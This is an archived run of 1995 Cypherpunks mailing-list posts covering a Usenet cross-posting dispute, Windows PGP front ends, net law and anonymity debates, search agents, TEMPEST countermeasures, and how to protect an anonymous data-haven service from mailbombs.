Newsgroups: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams
Subject: Re: Phil Zimmermann
Date: 6 Jan 1995 05:39:51 GMT
Organization: StarNet Communications, Inc
Lines: 16
Message-ID: <3eil37$6a at blackice.winternet.com>
References: <3dtkaj$lg8 at news-2.csn.net> <3dvdsb$ads$1 at mhade.production.compuserve.com> <3ei10l$mvo at blackice.winternet.com>
NNTP-Posting-Host: mwalleye.winternet.com

> We wish to apologize for Carol Anne's actions while with Winternet.
>
> This account has been deleted for breach of our AUP.
>
> Questions, comments, problems or general bitching, please reply to this
> message.
>
> --
> Mike Horwath    IRC: Drechsau    LIFE: Lover    drechsau at winternet.com

Looking at the groups that you cross-posted, I sure as heck would like to know what she did to get kicked off?;) What the heck do you have to apologize for Mike? Unless you might have been involved too?;) I told you you've been working too hard. Come on now bud, give us the lowdown!

--
Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List
Coming Soon: The Internet Debut of CENSORED.COM

From carolann at mm.com Sat Jan 7 01:42:30 1995
From: carolann at mm.com (Carol Anne Braddock)
Date: Sat, 7 Jan 95 01:42:30 PST
Subject: Nope, the Skypoint Newsreader didn't carry any of the 9 groups.
Message-ID:

Dear All,

And, amazingly neither does MM.Com. And if I'm going to infer, I'd better go back and look at the facts on hand. No, Mr. Horwath's reader has up to 4,500 or so groups in it at any given moment. Here at MM.Com we only have 1,009 to be precise. So let us remind ourselves that this didn't even get "full" coverage in a lot of places. And, in some maybe none at all.

So stay tuned, as the story of the anonymous remailer cartel works its way into place. I have a chain.exe script in the winternet.files. Spose I could go net.rad and go get another from soda.berkeley or somewhere.

Look remailers, meet somewhere face to face, shake hands, hug each other, cut a deal eyeball to eyeball, just do the best you can with what you've got. So remailer cartel 1.0 has a bug or two. So does all humanity. Even so did my logic for a minute or two (only). So go somewhere fun and sort it out. And write what wonderful "vacations" you're having, as you all will be MAKING MONEY FAST, within hours after your glorious return to civilization. (even money says the anon server bounces this to somebody)

And as I stated four postings ago. No Mr. Ste. Marie only ten, and as we saw in some cases only one. not hundreds or thousands, just a few. .1% One One Tenth of a Percent.
And, one instance of One One Hundredth of a Percent. About as bad as the pentium bug story. And that's still an acceptable post in any group. Somebody uses PGP in any of those groups. They are my friends.

I hope I can learn remailer procedure and code soon, it looks fun. Thanks for your time.

Love Always,
Carol Anne

From RopeGun at calvino.alaska.net Sat Jan 7 01:59:39 1995
From: RopeGun at calvino.alaska.net (Oren Tanay)
Date: Sat, 7 Jan 95 01:59:39 PST
Subject: pgp shells for windows....
Message-ID:

I've read the pgp docs and several other unofficial documents on pgp and I have come to the conclusion
that a shell for pgp is the most sensible approach using such a powerful encryption program. I've
searched to the best of my abilities and have found several pgp shells for windows, but all of them seem to
assume that the user has an above average understanding of the workings of pgp and all of its uses. At
this point you're probably thinking that I'm looking for an easy way to get around learning pgp the hard way,
but I'm not... the whole idea of pgp is that privacy and security be available to anyone, using any platform.
But ease of use was not really one of the features built into pgp. If anyone can refer me to a windows
shell for pgp (for dummies :-) ) I would like to get a copy of it for distribution on the bulletin board nets...

Was I too verbose?

\\|||||||//
 | o o |    Oren Tanay
 |  J  |    RopeGun at alaska.net
  \---      www.alaska.net/~RopeGun/RopeGun.html
"My Cat Can Eat A Whole WaterMelon"

>From owner-cypherpunks Sat Jan 7 02:21:34 1995

From erc at s116.slcslip.indirect.com Sat Jan 7 02:12:51 1995
From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Sat, 7 Jan 95 02:12:51 PST
Subject: pgp shells for windows....
In-Reply-To:
Message-ID:

> I've read the pgp docs and several other unofficial documents on pgp and I have come to the conclusion
> that a shell for pgp is the most sensible approach using such a powerful encryption program.
I've
> searched to the best of my abilities and have found several pgp shells for windows, but all of them seem to
> assume that the user has an above average understanding of the workings of pgp and all of its uses. At
> this point you're probably thinking that I'm looking for an easy way to get around learning pgp the hard way,
> but I'm not... the whole idea of pgp is that privacy and security be available to anyone, using any platform.
> But ease of use was not really one of the features built into pgp. If anyone can refer me to a windows
> shell for pgp (for dummies :-) ) I would like to get a copy of it for distribution on the bulletin board nets...

Which ones have you looked at?

--
Ed Carp, N7EKG    Ed.Carp at linux.org, ecarp at netcom.com
801/534-8857 voicemail    801/460-1883 digital pager
Finger ecarp at netcom.com for PGP 2.5 public key    an88744 at anon.penet.fi
** PGP encrypted email preferred! **
"What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning"

From RopeGun at calvino.alaska.net Sat Jan 7 02:21:34 1995
From: RopeGun at calvino.alaska.net (Oren Tanay)
Date: Sat, 7 Jan 95 02:21:34 PST
Subject: pgp shells for windows....
Message-ID:

winpgp2.6 was the most successful pgp shell I could find but the interface
was stale and nondescript. including the fact that when it executed the
commands it opened a window and I was interfacing with the dos pgp
interface, I found that a little redundant for a shell program; but then
again I'm not sure if an interface with pgp can be done any other way.

\\|||||||//
 | o o |    Oren Tanay
 |  J  |    RopeGun at alaska.net
  \---      www.alaska.net/~RopeGun/RopeGun.html
"My Cat Can Eat A Whole WaterMelon"

>From owner-cypherpunks Fri Jan 6 23:59:11 1995

From erc at s116.slcslip.indirect.com Sat Jan 7 02:32:20 1995
From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Sat, 7 Jan 95 02:32:20 PST
Subject: pgp shells for windows....
In-Reply-To:
Message-ID:

> winpgp2.6 was the most successful pgp shell I could find but the interface
> was stale and nondescript. including the fact that when it executed the
> commands it opened a window and I was interfacing with the dos pgp
> interface, I found that a little redundant for a shell program; but then
> again I'm not sure if an interface with pgp can be done any other way.

Try ftp.netcom.com:/pub/ec/ecarp/pgpwind.zip - you might find it a bit more to your liking. There are others out there, and their authors will probably speak up :)

--
Ed Carp, N7EKG    Ed.Carp at linux.org, ecarp at netcom.com
801/534-8857 voicemail    801/460-1883 digital pager
Finger ecarp at netcom.com for PGP 2.5 public key    an88744 at anon.penet.fi
** PGP encrypted email preferred! **
"What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning"

From rishab at dxm.ernet.in Sat Jan 7 03:08:51 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Sat, 7 Jan 95 03:08:51 PST
Subject: Compliance and lax Customs
Message-ID:

In India telco (and several other) laws are ridiculously outdated (see my "FREEdom on the Net in India" Electrosphere, WIRED 3.01), although our Customs are pretty techno-savvy, as they need to know prices off the cuff for all the goodies people try to smuggle in without duty. But we're quite adept here at ignoring many of the more inconvenient laws - I just bought myself a new 540 mb hard disk for the equivalent of $350, and none of the BBSes pay the required $50,000/year license fee.

It's nice to know that the US Customs are catching up with the technical incompetence one sees in the LEAs here. But I guess American Cypherpunks are too compliant to attempt to take advantage of such things. In fact, there's been a noticeable slump in the mirroring of crypto from US-only ftp sites to Europe.
Obviously Cypherpunks are far more law-abiding in _practice_ than the media would have us believe, based on what they _discuss_ ;-)

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                 "In between the breaths is
rishab at dxm.ernet.in              the space where we live"
rishab at arbornet.org              - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335           H 34C Saket, New Delhi 110017, INDIA

From rishab at dxm.ernet.in Sat Jan 7 03:08:58 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Sat, 7 Jan 95 03:08:58 PST
Subject: SAN FRANCISCO EDITORIAL
Message-ID:

Sandy posted Martha "Spam" Siegel's SF Chronicle editorial. If it boiled anyone's blood quite enough to write a letter to the paper on both the author's background as well as the unconstitutionality of her 'solutions', I'd be happy to sign my name in support.

BTW while paranoia is good for C'punks, I don't see a hidden plot in the recent media coverage of anonymity. The media likes 'hot' issues, and have flogged the other one - kiddie porn - to death. Everyone from Newsweek to The Economist mentioned pedophilia, simply because it grabs attention more than global K-12 projects conducted over the net, just as anonymity grabs more attention in relation to crime than to sexual abuse recovery groups.
-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                 "In between the breaths is
rishab at dxm.ernet.in              the space where we live"
rishab at arbornet.org              - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335           H 34C Saket, New Delhi 110017, INDIA

From rishab at dxm.ernet.in Sat Jan 7 03:09:04 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Sat, 7 Jan 95 03:09:04 PST
Subject: Law and ethics on the Net
Message-ID:

> ABA SCI/TECH SECTION, IPPP COMMITTEE
> LAW AND ETHICS ON THE "NETS"
> December 8, 1994

I've been on the Cypherpunk's mailing list for about half its lifetime, am a technology consultant based in New Delhi, do a weekly column on information society which has covered many of the issues you seem interested in, and write for WIRED magazine.

I am interested in law and ethics in cyberspace, and would like to participate in your project, as long as it is not primarily intended to culminate in a set of guidelines for legislation, which I believe to be pointless.

I'm including here some comments to your original announcement, which I only saw today.

> The development of a national information infrastructure and
> a global electronic network, of which Internet is the backbone, has
> presented a multitude of legal and ethical problems involving use
> and abuse of the networks, nationally and worldwide. Almost on a
> daily basis, news items announce electronic network transmissions
> constituting hate mail, profanity, vulgarity, obscenity, child
> pornography, sexual harassment, defamation and invasion of privacy.

Unfortunately, due to the way media works, we don't read of the benefits of total anonymity to participants in sexual abuse groups, human rights activists and many others. Going by what we read in the media, 93.5% of people on the Net are habitual child abusers, and 62% are nuclear-equipped narco-terrorists.

> The violation of intellectual property rights and information
> system security are also frequent occurrences. National and
> international discussions consider such questions as what "rules of
> the road" ought to apply, who can make them, how can they be
> enforced, and what will be the legal and political relationships
> between states and nations regarding cyberspace? It is argued that
> at present the lawless, the intolerant and the disrespectful seem
> able to pollute the worldwide information stream with little
> constraint.

Or free it from the monopoly of large media organizations. Ninety-five percent of the world's news is distributed by four agencies, who effectively shape our view of the world at large, and decide for us the crises du jour. The Net, _precisely_ because of its unregulated, bottom-up structure, allowed activists to communicate during the revolution in Chiapas, Mexico; got international agencies to offer support for the massive earthquake in Latur India at once, rather than wait for a Time magazine photo feature (which - surprise! - was on Somalia just days before the world suddenly took notice of _that_ problem).

The commitment to freedom of expression, in _any form whatsoever_ including the anonymous, is arguably the cause for much of the economic and technological power of the US. It is a matter for concern that, rather than help spread this freedom to the rest of the world (as is inevitable _if_ the Internet continues not to be 'governed'), many in and out of government are attempting to clamp down, out of an almost primeval fear of Digital Evil that stems from ignorance of wider issues.

> Certainly, the current state of anarchy in national and global
> electronic networks cannot continue if the technology is to achieve
> the remarkable benefits that have been predicted in terms of
> communications among institutions and individuals, whether
> government, business or society at large.
The purpose of the

On the contrary, the 'current state of anarchy' has largely been responsible for advancements in US research for the two decades since the Internet was born. What is needed, perhaps, is a dialogue to improve understanding among 'society at large' of a community that is, though at present largely composed of technology professionals or academics, an example of multicultural and multinational cooperation and tolerance that would be nice to see in, say, Los Angeles, or elsewhere in the 'real world'.

> George B. Trubow, Professor of Law
> Director, Center for Informatics Law
> The John Marshall Law School
> 315 S. Plymouth Ct.
> Chicago, IL 60604-3907
> Fax: 312-427-8307; Voice: 312-987-1445
> E-mail: 7trubow at jmls.edu

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                 "In between the breaths is
rishab at dxm.ernet.in              the space where we live"
rishab at arbornet.org              - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335           H 34C Saket, New Delhi 110017, INDIA

From carolann at mm.com Sat Jan 7 03:27:52 1995
From: carolann at mm.com (Carol Anne Braddock)
Date: Sat, 7 Jan 95 03:27:52 PST
Subject: Big vs Little providers (punkette view)
In-Reply-To:
Message-ID:

Perspective, Perspective, Perspective. You're both right on many counts.

Mike is a "fine benevolent dictator". He has many "happy" users. He has now five local Usenet groups of winternet.* But he reneges on deals. The shirts were ready before Thanksgiving. He possesses them as I write. He violates the spirit by which I processed their making (the samples). Many orders for the shirts were made prior to Thanksgiving, I still have the mail for them at squeaky.free.org (good storage place).

Then there's the GT story. I organized one for them. Created a sked for more of them. He didn't like the sked. The Users did.

There was an incident of much greater magnitude, that drew far less attention. It was my call for WWW crosspost linkages.
It was hand posted to 75 or so groups, one at a time. The plus minus ratio of mail was last at 412 positive, and 8 negative. Squeaky has half the mail. There's 50 and growing crossposts that are drawing 200+ accesses a day to that page. Any other page he has on his system is only drawing 40-50 responses at best. I have copies of the daily access statistics /usr/local/ect/httpd/stats/summary

If my mail is frozen, so too should all phases of that account, including the WWW Pages. Besides maybe they "have violated acceptable use policy", too! That's just sound administrative policy to shut everything down.

You haven't heard about Webbittown, yet. Bruce Sterling owns #9 Blackice Blvd. It's a Web page city of 20,000 individual pages, at a $1,000 a page. Just like Real Estate. Run by doom software drivers. Mike's poor vision is another T1 line, maybe two if he's lucky.

They are hacking his machine like crazy, he claims. That means you got some serious enemies, if it's true. That means you don't abuse your fans like me, at a time like that. It also probably means one of his "friends" is his enemy.

I have an alt.dream.lucid of having the world's best web server. I dream of people being able to protect their HTML code with PGP. Functional on top, crypto underneath. Encryption on the fly.

This was something that was bound to happen sooner or later. Better sooner than later. Now there's precedent. 10 groups, and the reply's caught in the pine processor 3.91, too! Doc Ozone says pine 3.91's full of leaks.

Doc Ozone and I make machines for people who are 'netless'. It's called the tired, poor project. Give us your tired, your poor, your old PC's. Miles, a seven year old is next on the list. We gave Mike a Sparc monitor from one of our equipment forays. Free, zip, zilch for we got for free zip zilch. He begged for it. It was still sitting in the office Wednesday, unfixed for anyone.

I equate the thing to a domestic abuse situation.
As long as it's minor, as long as it's hushed, it's OK. Even this would have been OK if it had stayed silent.

There is a safety in numbers factor. AOL proves it. And as they descend upon the net things will change again.

The moment I called little tiny Micro Net, I knew there would be fallout. I will not respond to the actual posting unless I'm asked a direct question about the substance of the post. But it's pretty self explanatory, and I cry to think there's a real bitch.

Yes, at Netcom, I can now probably get much further, much faster. No I wouldn't subject myself or anyone to Winternet. But I wouldn't subject a newbie to Netcom either. I did it once and was sorry, too.

I'm just a punk girl who writes great HTML code. And I hope that it can be protected by cryptography, that's my little goal. I hope I have both made you think and feel you are right, because both of you are, in certain kinds of ways. And you know it, too.

Now where was I?, oh yeah, Is there like a Remailer for Dummies, quick reference manual? I could have fun learning & doing that.

Till My Next Mini-Rant,
Love Always,
Carol Anne

Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List
Coming Soon: The Internet Debut of CENSORED.COM

From bart at netcom.com Sat Jan 7 03:36:04 1995
From: bart at netcom.com (Harry Bartholomew)
Date: Sat, 7 Jan 95 03:36:04 PST
Subject: Indexing and searching
In-Reply-To: <9501062315.AA29835@deepthought.Princeton.EDU>
Message-ID: <199501071134.DAA17942@netcom4.netcom.com>

We sure need some indexing and searching to use the archive. A directory command at ftp.hks.net:/cypherpunks/nntp/cypherpunks gets you 8200+ lines of:

...
-rw-r--r-- 1 8 8 34609 Sep 24 20:02 3255
-rw-r--r-- 1 8 8 1154 Sep 24 20:24 3256
-rw-r--r-- 1 8 8 1443 Sep 25 03:15 3257
-rw-r--r-- 1 8 8 1675 Sep 25 03:33 3258
-rw-r--r-- 1 8 8 1634 Sep 25 10:35 3259
-rw-r--r-- 1 8 8 3243 Jul 21 23:59 326
-rw-r--r-- 1 8 8 955 Sep 25 11:41 3260
-rw-r--r-- 1 8 8 2088 Sep 25 12:05 3261
-rw-r--r-- 1 8 8 3930 Sep 25 12:06 3262
...

Why, it's virtually encrypted! How fitting.

From jonathon at izanagi.sbi.com Sat Jan 7 03:58:33 1995
From: jonathon at izanagi.sbi.com (Jonathon Fletcher)
Date: Sat, 7 Jan 95 03:58:33 PST
Subject: No Subject
Message-ID:

who cypherpunks
end

From cyber1 at io.org Sat Jan 7 03:59:40 1995
From: cyber1 at io.org (x)
Date: Sat, 7 Jan 95 03:59:40 PST
Subject: intelligent discovery agents
Message-ID:

On Fri, 6 Jan 1995 Nesta Stubbs wrote:

>> There was some recent talk about network agent technology on this list.
>>
> does anyone have any information about intelligent agents? I mean I know
> about filter and stuff, but they aren't intelligent agents. I assume one
> would be something like the WWW worm and other searching scripts that
> have a database of information to cross-reference their finds and decide
> what to send back to you.

You might want to check out Brian LaMacchia's Ph.D. proposal to create a new class of knowbot, to be termed "Internet Fish". It is posted on http://www.swiss.ai.mit.edu/~bal/bal-home.html

LaMacchia's proposal is interesting in that his 'fish' seem to have limited autonomy, thus moving us closer to a content-addressable model of net info retrieval.

Also of interest is RFC 1728: Resource Transponders, by C. Weider. The idea is that there should be meta-information (information about information) available for use by info retrieval programs like 'archie'. From ftp://nic.ddn.mil/rfc/rfc1728.txt

The following is extracted from LaMacchia's abstract:

> We will design, implement and deploy a system for constructing
> ``Internet Fish,'' a new type of resource discovery tool.
Internet
> Fish attempt to discover new sources of information related to a
> particular topic; characteristics that describe the topic of interest
> may be specified by the user or deduced by the Fish over the course of
> time. As part of the information-gathering process Fish conduct
> long-term conversations with users; these conversations permit Fish to
> ask for human assistance when necessary and allow humans to
> dynamically reallocate Fish resources. In addition, Fish facilitate
> *serendipitous* resource discovery; that is, the act of finding
> interesting information in an unexpected place or manner, information
> that we were ``lucky'' to have discovered.

From rishab at dxm.ernet.in Sat Jan 7 04:24:43 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Sat, 7 Jan 95 04:24:43 PST
Subject: Information highways, oceans and islands
Message-ID:

Electric Dreams #42 examines the notion of distance in and out of cyberspace, and debunks the information highway as a metaphor.

Send a blank message with a command in the Subject: line of the header, for more info. 'get dreams-42' (without quotes) for a copy of the article; 'get index' for an index of those so far; and 'subscribe' to receive 5 kbytes every week.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                 "In between the breaths is
rishab at dxm.ernet.in              the space where we live"
rishab at arbornet.org              - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335           H 34C Saket, New Delhi 110017, INDIA

From rishab at dxm.ernet.in Sat Jan 7 04:25:18 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Sat, 7 Jan 95 04:25:18 PST
Subject: 3D TV and crypto
Message-ID:

This just might have a crypto app ;-)

Just saw a BBC WSTV report on a 3D TV developed in the UK. Unlike other extremely expensive 3D TVs based on laser-holograms, this one has an ordinary hi-def screen, pointing upwards.
A beam splitter crosses the screen at an angle, and reflectors are above and to the side, so the image actually forms as an intersection of three beams in mid-air. A profile view:

[Profile-view ASCII diagram; its labels: "reflects down", "reflects left", "image forms here mid-air", "TV image is formed here, facing up".]

The company says 'affordable' models could appear next year.

ObCrypto: Suppose the reflector(s) is another TV, displaying a moving-image 'key'? The main TV image could be 'encrypted' by subtracting the 'key' from itself... Voila! And there's more... Suppose the 'key' is light passed through a human hand...

Oh, you thought the first e-mail from a head of state was from Sweden? Queen Elizabeth II sent one in the 70s - according to a wonderful episode of BBC's Tomorrow's World, which did a cyberspace episode that included a sort-of solution to the travelling salesman problem by BT physicists using evolutionary algorithms! The episode DID NOT MENTION CHILD PORNOGRAPHY!!!!

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                 "In between the breaths is
rishab at dxm.ernet.in              the space where we live"
rishab at arbornet.org              - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335           H 34C Saket, New Delhi 110017, INDIA

From jonathon at izanagi.sbi.com Sat Jan 7 04:26:04 1995
From: jonathon at izanagi.sbi.com (Jonathon Fletcher)
Date: Sat, 7 Jan 95 04:26:04 PST
Subject: your mail
Message-ID:

On Sat, 7 Jan 1995, Jonathon Fletcher wrote:

> who cypherpunks
> end

I know, I know. I'm sorry. I'll send it to the right place next time.
Small slip of the qwertys -Jon -- Jonathon Fletcher, jonathon at japan.sbi.com From carolann at mm.com Sat Jan 7 04:40:49 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 04:40:49 PST Subject: Files and mail In-Reply-To: <199501070607.BAA04310@bb.hks.net> Message-ID: You should paint this as a canvas,and sell it for five big digits. This post right here, in all its mono glory, is real art. On Sat, 7 Jan 1995, L. Todd Masco wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > - -----BEGIN PGP SIGNED MESSAGE----- > > > Anybody want to offer odds on whether or not this merry little exchange > will be reported in Wired as news? > - - -- > Todd Masco | "life without caution/ the only worth living / love for a man/ > cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich > Cactus' Homepage > - - -- > Todd Masco | "life without caution/ the only worth living / love for a man/ > cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich > Cactus' Homepage > > - -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBLw301xNhgovrPB7dAQFj3gP8CJV4TyRUl+sEQRHX6qH2TKK+B+JKLrwk > kUM7Y0yaY2ZwScBnYRva5/Pyu8r70i2Z3yQUQFF7ECasxHwrYftfWweD0/4Pc4ws > qEGNfGIheHtnP/J0B7G7xsIyAMSZIlUD3RCQ49o4BOpWk6bev4t5i/RP10yK9sit > dA1go4Jiaag= > =eQPF > - -----END PGP SIGNATURE----- > - --- > [This message has been signed by an auto-signing service. A valid signature > means only that it has been received at the address corresponding to the > signature and forwarded.] 
> > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > Comment: Gratis auto-signing service > > iQBFAwUBLw4vqSoZzwIn1bdtAQER/QF/SkRQGEEjHn+E0SZEiWs0McAvRccuzxFQ > Uv76Kmmya6EMxTJOJFtatP1uQ7V6JmSA > =g1Bd > -----END PGP SIGNATURE----- > Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From carolann at mm.com Sat Jan 7 04:52:46 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 04:52:46 PST Subject: Killfiles 101 Message-ID: 1. The best and only way you can be sure you're killing a file is to turn your machine off. Only then can you be sure it is dead. 2. If you must resort to using killfiles, (great marketer trick, make you use it again and again, and again, like a gun) kill "classes" of files, as opposed to individuals, you'll get better kill ratio. A good example is anon or wizvax users. 3. Note: Killfiles are a censor's best friend! And you'll become what you swore you wouldn't. does your signature tell the truth nesta? Can't know everything with a killfile! Eventually you'll kill the file that'd get you sex. Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From carolann at mm.com Sat Jan 7 05:17:09 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 05:17:09 PST Subject: Dear Zimmy, Message-ID: They still miss the point, I think. They haven't figured out how to teach others. They can do it in ten newsgroups. They whine and snivel like two year old brats. They just can't for the life of them grab the original letter. They can't go teach their top-ten newsgroups. They can't figure out how to come back here and rant how they did it and I didn't (lose my account over it) They rapidly forget crypto loses it's power against a bullet. Eventually they'll come with guns again and take the machines away. 
There were 10,000 newsgroups I only went to 10. The best kill file is a turned off machine. I touched my first fortran card 22 years ago. There's a lot of difference between showing up the 12th, and showing up in say 12 newsgroups. Sorry Zimmy, It don't look good for the home team.

Love Always,
Carol Anne

Signature back on the drawing board
Coming Soon: The Internet Debut of CENSORED.COM

From carolann at mm.com Sat Jan 7 05:32:38 1995
From: carolann at mm.com (Carol Anne Braddock)
Date: Sat, 7 Jan 95 05:32:38 PST
Subject: A day in the life of the Cypherpunk list
Message-ID:

Dear Bruce,

When you see the actual postings on the last 24 hours, they are all running to the newsgroup to use killfiles. Isn't it ostriches that do that kinda thing? They've been caught napping. The Webbittown Post Office could use all the remail people. Every last one of them. And meanwhile, still stuck in the pine composer, lies the original response. Good copy, definitely good copy.

Love Always,
Carol Anne

Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List
Coming Soon: The Internet Debut of CENSORED.COM

From carolann at mm.com Sat Jan 7 06:02:50 1995
From: carolann at mm.com (Carol Anne Braddock)
Date: Sat, 7 Jan 95 06:02:50 PST
Subject: intelligent discovery agents
In-Reply-To:
Message-ID:

There's this rad.web.intelligent person by the name of Sang. Visit Sang at http://www.inlink.com/users/sangria/homepage.html Sang has more information on Robots, Spiders, Ants, and Worms than any other computer person I have yet to link up with. Feel free to grab a copy of the Web Server Software while you're there.

Love Always,
Carol Anne

On Sat, 7 Jan 1995, x wrote:

> On Fri, 6 Jan 1995 Nesta Stubbs wrote:
>
> >> There was some recent talk about network agent technology on this list.
> >>
> > does anyone have any information about intelligent agents?
I mean I know Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From jya at pipeline.com Sat Jan 7 07:58:53 1995 From: jya at pipeline.com (John Young) Date: Sat, 7 Jan 95 07:58:53 PST Subject: NYT on Survivalists Message-ID: <199501071559.KAA23283@pipe3.pipeline.com> Philip Weiss writes in tomorrow's Magazine a very long (52K) cover story on Idaho survivalists Bo Gritz, Randy Weaver and the burgeoning anti-government population. The longest story I've seen in there in years. Mentions societal threats of cashless economy, tax nix, and more c'punk tonics. Is The Times getting antsy, seeding a L&O crackdown? Or huffing luridities? See for yerself by sending blank message with subject: SUR_huf From jathomas at netcom.com Sat Jan 7 08:44:51 1995 From: jathomas at netcom.com (John A. Thomas) Date: Sat, 7 Jan 95 08:44:51 PST Subject: TEMPEST Questions... In-Reply-To: <121_9501062145@borderlin.quake.com> Message-ID: On 6 Jan 1995, Derek Zeanah wrote: > > I'm writing an article on TEMPEST technology. > > The focus is on what TEMPEST is and how to defeat it, if possible. So far > I've gotten some insightful information, but I'm looking for all I can get. > > Has anyone ever heard of TEMPEST being used in the continental US? Can anyone > tell me what measures offer some level of protection, or steps that can be > taken to reduce the likelihood of being successfully targeted? Has anyone > ever seen TEMPEST in action? > You might start with van Eck, Wim, "Electromagnetic Radiation from Video Display Units: An Eavesdropping Risk?", Computers & Security 4 (1985) 269-286. That will give you the technical basics. If someone has actually seen Tempest interception in action, I'd like to hear about that as well. John A. 
Thomas jathomas at netcom.com N5RZP 214/263-4351

From root at einstein.ssz.com Sat Jan 7 08:59:01 1995
From: root at einstein.ssz.com (root)
Date: Sat, 7 Jan 95 08:59:01 PST
Subject: TEMPEST Questions...
In-Reply-To:
Message-ID: <199501071544.JAA00423@einstein.ssz.com>

Hi all,

Regarding Tempest,

Something similar happens to me in my workshop. I have several computers stacked on two shelves. It is quite common for several of them to be on at one time. In particular when I have my Amiga 1200 driving my NEC TV/Monitor I notice that it appears on the other composite video monitors even though the Amiga drives RGB. What I think is happening is that the NEC is converting the RGB to standard TV drive rates. The short of it is that I can watch my Amiga 1200 on my TV that is sitting a couple approx 3ft. from it.

It could also be the fact that the 1200 has a video output that is poorly shielded. It is capable of driving a composite device directly as well.

One aspect that is interesting is that if you have several sources going at once the quality degrades. One possible technique for defeating such monitoring would be to have a couple of standard video recorders drive a video game rf modulator tied to an antenna to provide a 'shell' of drivel from your cable feed. Your VCR may be able to drive the antenna directly.

Take care.

From dfloyd at io.com Sat Jan 7 09:09:48 1995
From: dfloyd at io.com (dfloyd at io.com)
Date: Sat, 7 Jan 95 09:09:48 PST
Subject: Data Haven problems
Message-ID: <199501071710.LAA21334@pentagon.io.com>

-----BEGIN PGP SIGNED MESSAGE-----

While programming my data haven code, I am wondering how to guard against spamming the data haven parser. It is trivial to mount a denial of service attack by repeatedly mailing large files, which will fill up the quota or filesystem of the data haven host, and if you have mail on a root partition, will cause hangs or crashes.
Any ideas on how to guard against mailbombs, and to confirm to the sender that their files are stored successfully? Perhaps do a mailing with a test command that validates the existence of the file, and sends a reply back whether the file is okay or not, or would this result in a possible security hole?

As to the code, this will have to be my second rewrite as I am going to do it in perl code, rather than C... last rewrite was from a daemon to a program activated by a .forward file.

Lastly, instead of postage (like a remailer would get), how hard would it be to implement "rent" where if the "rent" is not paid, and a grace period has elapsed the file would be trashed. All this while preserving the anonymity of the sender and the data haven site.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From root at einstein.ssz.com Sat Jan 7 09:21:03 1995
From: root at einstein.ssz.com (root)
Date: Sat, 7 Jan 95 09:21:03 PST
Subject: Data Haven problems
In-Reply-To: <199501071710.LAA21334@pentagon.io.com>
Message-ID: <199501071606.KAA00541@einstein.ssz.com>

>
>
> While programming my data haven code, I am wondering how to guard against
> spamming the data haven parser. It is trivial to mount a denial of
> service attack by repeatedly mailing large files, which will fill up the
> quota or filesystem of the data haven host, and if you have mail on a
> root partition, will cause hangs or crashes.
>

If there is no cost associated with the haven and there are no account limitations (i.e. anyone can get an account) then I don't see a means to do it reliably.
However, if you work up a fee based scheme such that you charge per M then it is trivial. If the data is larger than the account balance it bounces. By limiting the availability of accounts you can make it less enticing for users to spam the haven because they are hurting themselves. And it is assumed that since the accounts are limited that there is an assumed web of trust working.

> Any ideas on how to guard against mailbombs, and to confirm to the sender
> that their files are stored successfully? Perhaps do a mailing with
> a test command that validates the existence of the file, and sends a
> reply back whether the file is okay or not, or would this result in a
> possible security hole?
>

It seems to me that a message should come back only if there is a problem.

> As to the code, this will have to be my second rewrite as I am going to
> do it in perl code, rather than C... last rewrite was from a daemon to
> a program activated by a .forward file.
>
> Lastly, instead of postage (like a remailer would get), how hard would it
> be to implement "rent" where if the "rent" is not paid, and a grace period
> has elapsed the file would be trashed. All this while preserving the
> anonymity of the sender and the data haven site.
>

This form of dating files is pretty common in BBS systems where if a user doesn't log in for say 30 days the account and its contents are deleted. To do this doesn't even require knowing anything about the user other than how long the files have been there versus how long they are supposed to be there.

From adwestro at ouray.Denver.Colorado.EDU Sat Jan 7 09:38:57 1995
From: adwestro at ouray.Denver.Colorado.EDU (Alan Westrope)
Date: Sat, 7 Jan 95 09:38:57 PST
Subject: Peter D. Lewis
In-Reply-To: <199501070558.AAA04212@bb.hks.net>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

